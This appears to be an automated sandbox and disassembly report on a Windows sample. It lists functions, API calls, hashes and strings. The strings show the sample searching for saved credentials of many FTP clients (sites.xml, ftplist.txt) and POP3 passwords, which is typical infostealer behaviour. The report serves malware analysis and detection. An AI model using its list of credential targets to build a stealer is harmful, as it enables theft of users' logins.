                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CurrentHandleModuleProcess
                                                • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                • API String ID: 977827838-3073145729
                                                • Opcode ID: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                                • Instruction ID: b4fabcce51f297447bc7e22879592c7cf0400204f4cc9062f02e0cb4fe293c57
                                                • Opcode Fuzzy Hash: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                                • Instruction Fuzzy Hash: C4F0547271020466C710B2B96C45BDF269887C03A6F290A37F105F22C1E9FCDD858278
                                                Function 0040D854 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <setting name="$value="
                                                • API String ID: 0-3468128162
                                                • Opcode ID: 12a4b97974795b937dbac86db911079b7e305fb6aa103b601be57af741cbcaae
                                                • Instruction ID: 73fa1e58b4d6e0f5acaca6cd35f95d233c17529f6f8bb818b449ef047748446b
                                                • Opcode Fuzzy Hash: 12a4b97974795b937dbac86db911079b7e305fb6aa103b601be57af741cbcaae
                                                • Instruction Fuzzy Hash: B0319272D0425A9ECF11BBE58C419EEBFB19F15318F1440B7E450B2291D6B84A84D7A9
                                                Function 0040816D Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FTPCON), ref: 0040819B
                                                • StrStrIA.SHLWAPI(00704458,FTP CONTROL,00000000,00704138,FTPCON), ref: 004081A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .prf$8Ap$FTP CONTROL$FTPCON$XDp$\Profiles
                                                • API String ID: 0-1674780894
                                                • Opcode ID: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
                                                • Instruction ID: 25b8ca94bf750d55a6aec51c2f4f4f00567277a79abcf93635d07a7db2700455
                                                • Opcode Fuzzy Hash: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
                                                • Instruction Fuzzy Hash: A8018070600205BADB127A259D02FDF7A59DF81314F34413BB995791E2EA7C5A8292AC
                                                Function 00405BC0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FTP Navigator), ref: 00405BEE
                                                • StrStrIA.SHLWAPI(00704458,FTP Commander,00704458,FTP Navigator), ref: 00405C1C
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTP Commander$FTP Navigator$XDp$ftplist.txt
                                                • API String ID: 1884169789-563579026
                                                • Opcode ID: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
                                                • Instruction ID: 36e39a21a9329dbe8d23580b16dfc1acef3c6298e5863b6ab1a3678991a917a5
                                                • Opcode Fuzzy Hash: d501a6024a88707594d1eb9d2829bcb1643201a2086780d712ba321ce2283e76
                                                • Instruction Fuzzy Hash: 1401C870504511FAEB1136228C02FEF3E5ADB82354F24413BB854751E6D77C5FC29AAC
                                                Function 00401FFD Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
                                                • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
                                                • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040203F
                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402054
                                                • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402063
                                                • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040206A
                                                • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                                                • String ID:
                                                • API String ID: 3150701006-0
                                                • Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                                                • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                                                • Opcode Fuzzy Hash: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                                                • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                                                Function 004086D8 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ftp://$http://$https://
                                                • API String ID: 0-2804853444
                                                • Opcode ID: 85a20b7f940cd11f371e229cab775ce235b8a0384adc6a49feb18a3ae16c6eca
                                                • Instruction ID: 81f334c42a3cb0fc056165a4037353c858dea4867f82d2d186d61bdc58b91dcb
                                                • Opcode Fuzzy Hash: 85a20b7f940cd11f371e229cab775ce235b8a0384adc6a49feb18a3ae16c6eca
                                                • Instruction Fuzzy Hash: 2E61F872800109FEDF11AF91CD45AEEBBB9EB04348F10807BB841B51A1DB798B95DB98
                                                Function 0040E0FE Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "/>$winex="
                                                • API String ID: 0-1498080979
                                                • Opcode ID: ee3a9678dbcfc644506b129ddf0c60544aeca980f19c114f9fc06e692d1e46ee
                                                • Instruction ID: a65735a88df2e3c906ae4414ece12a79dd6024024b2867e7669953596bd514cb
                                                • Opcode Fuzzy Hash: ee3a9678dbcfc644506b129ddf0c60544aeca980f19c114f9fc06e692d1e46ee
                                                • Instruction Fuzzy Hash: 43313E3290401ABEDF12ABA2CC02DEE7E76AF44344F10483BF501B51F1D7798A61EB99
                                                Function 0040CFF0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,FTPNow), ref: 0040D017
                                                • StrStrIA.SHLWAPI(00704138,FTP Now,00704138,FTPNow), ref: 0040D028
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 8Ap$FTP Now$FTPNow$sites.xml
                                                • API String ID: 0-1978225022
                                                • Opcode ID: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
                                                • Instruction ID: ec990e8c8fde0540a055802f0a5bafa42fe6efae90b5ffc829ae8747faa2dcf0
                                                • Opcode Fuzzy Hash: fe4c2ac575d338e4399085464dc42a8b401bee19fcd63c00be131e2c53f39f8e
                                                • Instruction Fuzzy Hash: 04F08670900101B5DB3136758C42FAF3A999B8275CF14413BB928B11E6E6BCCEC692AD
                                                Function 00401E4C Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 33stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00401E6D
                                                • lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                • lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: GHA$GHA
                                                • API String ID: 2414487701-4188437078
                                                • Opcode ID: 4a2ac044a1f3ec6f3ac2d9ab5d43939d70f26caacab916fba1e10c06da4c4d4e
                                                • Instruction ID: d9246f528be96856b322303a71286aa71aff6bea291017c40e37798af4e07103
                                                • Opcode Fuzzy Hash: 4a2ac044a1f3ec6f3ac2d9ab5d43939d70f26caacab916fba1e10c06da4c4d4e
                                                • Instruction Fuzzy Hash: DAF03A75500208BEDF013F62CC85ADD3A9AEB50358F00C53BB8192A262D7BD8AD48B88
                                                Function 00401A27 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 00401A3A
                                                • GlobalLock.KERNEL32(?), ref: 00401A55
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GlobalUnlock.KERNEL32(?), ref: 00401A7D
                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                • String ID: CRYPTED0YUI1.0
                                                • API String ID: 4083238039-1217275205
                                                • Opcode ID: 545c777eb07fd0e7c0e595b1e3f55fc495aaecec74257f33e463e1684f6cb145
                                                • Instruction ID: 291b1819b17b0b52e8b302f92d65d305c822eefb8dbf6a76828d30f87d665d9c
                                                • Opcode Fuzzy Hash: 545c777eb07fd0e7c0e595b1e3f55fc495aaecec74257f33e463e1684f6cb145
                                                • Instruction Fuzzy Hash: A1118671D00108BADF026FA1CC429DD7F7AEF44348F008076B915B51B1D77A8AA5AB58
                                                Function 0040FB14 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?,0040FB29), ref: 0040FB39
                                                • GlobalLock.KERNEL32(?), ref: 0040FB5A
                                                • GlobalUnlock.KERNEL32(?), ref: 0040FB72
                                                • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$FromLockStreamUnlock
                                                • String ID: STATUS-IMPORT-OK
                                                • API String ID: 2287449323-1591331578
                                                • Opcode ID: 346b4dea8ef0dae1f6fdfc22f3f8325ca76037283ec6642742aa729caa4fbcc9
                                                • Instruction ID: 90cea658c6c8212aa9fef009ba96f0a063fbcad0abcecaf4235fdd33f3ce5274
                                                • Opcode Fuzzy Hash: 346b4dea8ef0dae1f6fdfc22f3f8325ca76037283ec6642742aa729caa4fbcc9
                                                • Instruction Fuzzy Hash: B0012135D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBA9E949B58
                                                Function 0040242B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                • lstrlen.KERNEL32(?), ref: 0040243F
                                                • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: .exe
                                                • API String ID: 2414487701-4119554291
                                                • Opcode ID: b3ab67e4c25ae85d73d89bbcc7baa1674134501c8b04b5abb503f5a19a2c8901
                                                • Instruction ID: f255478a9709c47b6028815859772bdce8d28858f668d5172353d83d27d3e8c2
                                                • Opcode Fuzzy Hash: b3ab67e4c25ae85d73d89bbcc7baa1674134501c8b04b5abb503f5a19a2c8901
                                                • Instruction Fuzzy Hash: F4F0C83120429269DB2132268C09F6F6F859B92744F14003BF640B72D3D7FC989297BE
                                                Function 0040E63A Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <POP3_Password2
                                                • API String ID: 0-2923094552
                                                • Opcode ID: 97ee5e5c3115971875eaef779bf3ad8748e7c7dee18b90b3a614ebe06c78d45e
                                                • Instruction ID: 81c7923d4842b803ad45ce7413c013c6613b7a06965b9ff00af2c8356a2977a1
                                                • Opcode Fuzzy Hash: 97ee5e5c3115971875eaef779bf3ad8748e7c7dee18b90b3a614ebe06c78d45e
                                                • Instruction Fuzzy Hash: 7C416031900019BEDF12ABA2DC01CEEBE76EF58354B144837F501B61A1D77A4E61EBA9
                                                Function 0040CD6B Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                                                • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                • String ID:
                                                • API String ID: 1890766102-0
                                                • Opcode ID: 0dc8a9e704d732632ae677e2a4eeb85f90688fa455183c1d35bdcec236b17009
                                                • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                                                • Opcode Fuzzy Hash: 0dc8a9e704d732632ae677e2a4eeb85f90688fa455183c1d35bdcec236b17009
                                                • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                                                Function 00406A5C Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,UltraFXP), ref: 00406A8A
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: 8Ap$UltraFXP$XDp$\sites.xml
                                                • API String ID: 3221862373-444401445
                                                • Opcode ID: 3ee557d8948749a9f363e05ac3ab561d7af12fe1c0779f2872b34504749073ba
                                                • Instruction ID: fe50e8412d5de4826f8aa5028d62146759da49d9ede5e75c6998d87ff6d2b012
                                                • Opcode Fuzzy Hash: 3ee557d8948749a9f363e05ac3ab561d7af12fe1c0779f2872b34504749073ba
                                                • Instruction Fuzzy Hash: CB01F270600105BADB1277258C02F9B3E59DB82324F24813BB951B21E3D77C4EA296AC
                                                Function 0040B043 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,DeluxeFTP), ref: 0040B071
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$DeluxeFTP$XDp$sites.xml
                                                • API String ID: 1884169789-17931946
                                                • Opcode ID: b791a2c04080efa2ee5c3c4b65acfa7ed633b008d2bb8f4cfed1c2e7b6693c2e
                                                • Instruction ID: f3e3bf22580bc8462cbc14a14de12222ca0203319865bdfe03756184609a4090
                                                • Opcode Fuzzy Hash: b791a2c04080efa2ee5c3c4b65acfa7ed633b008d2bb8f4cfed1c2e7b6693c2e
                                                • Instruction Fuzzy Hash: 3F01F970500105BADB2177358C01F9F7E59DB81354F24413BB964B51E2D77C9E8293DC
                                                Function 0040E04F Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,FastStone Browser), ref: 0040E07D
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 8Ap$FTPList.db$FastStone Browser$XDp
                                                • API String ID: 1884169789-1527714265
                                                • Opcode ID: 4695791087d13fab206f330d85effeb0877b2d61392cc71d6ea480aa4e0e76d8
                                                • Instruction ID: 8b7ad658e0f9898fae75c5c852b5ba092d96d59e02dd99aacdff7b292d3b8023
                                                • Opcode Fuzzy Hash: 4695791087d13fab206f330d85effeb0877b2d61392cc71d6ea480aa4e0e76d8
                                                • Instruction Fuzzy Hash: 0801F930500115BAEB217736CC01F9B7F95DB82354F28453BB850711E2E7BC8E9293AC
                                                Function 0040E4E8 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(00704458,My FTP), ref: 0040E516
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
